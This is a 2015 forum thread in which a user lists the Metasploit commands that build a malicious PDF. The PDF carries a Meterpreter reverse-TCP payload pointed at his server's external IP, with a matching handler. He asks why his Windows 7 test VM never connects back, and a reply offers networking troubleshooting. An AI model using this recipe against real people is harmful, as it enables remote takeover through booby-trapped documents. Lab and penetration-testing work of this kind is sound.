dns_master Posted April 7, 2015 Share Posted April 7, 2015 Hello guys, i wanted to use the Adobe PDF Embedded Exe NOJS Exploit (use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs) on my Ubuntu Server where i installed Metasploit. After setting up the exploit: Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 85.214.XX.XX Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename file.pdf Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit I used for localhost my Server IP Adress, in case to make a real-world pentesting. After that, setting up the multi handler to get the reverse connection: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 85.214.XX.XX exploit I sent the PDF file to my virtual machine, Windows 7. I run the PDF file, but i didn't get the reverse connection - i didnt received a connection on metasploit. What am I doing wrong ? A log of my server: Linux 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Thank you guys. Quote Link to comment Share on other sites More sharing options...
digininja Posted April 7, 2015 Share Posted April 7, 2015 Is the viewer that you are using vulnerable? Why are you using an external IP when doing all the testing internally? Use an internal IP and make sure that the two machines can see each other. Quote Link to comment Share on other sites More sharing options...
dns_master Posted April 7, 2015 Author Share Posted April 7, 2015 Thank you for your replay. Ok, i try with internal IP. But is there no way to use the external IP for reverse connection ? Greetings. Quote Link to comment Share on other sites More sharing options...
digininja Posted April 7, 2015 Share Posted April 7, 2015 You can use whatever IP you want as long as the two machines can talk to each other through them. Is the server listening on that IP? Is the port NAT'd through or open? Not meant as an insult but I'd suggest you learn some basic networking before you try to do exploitation, it will make your life a lot easier. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.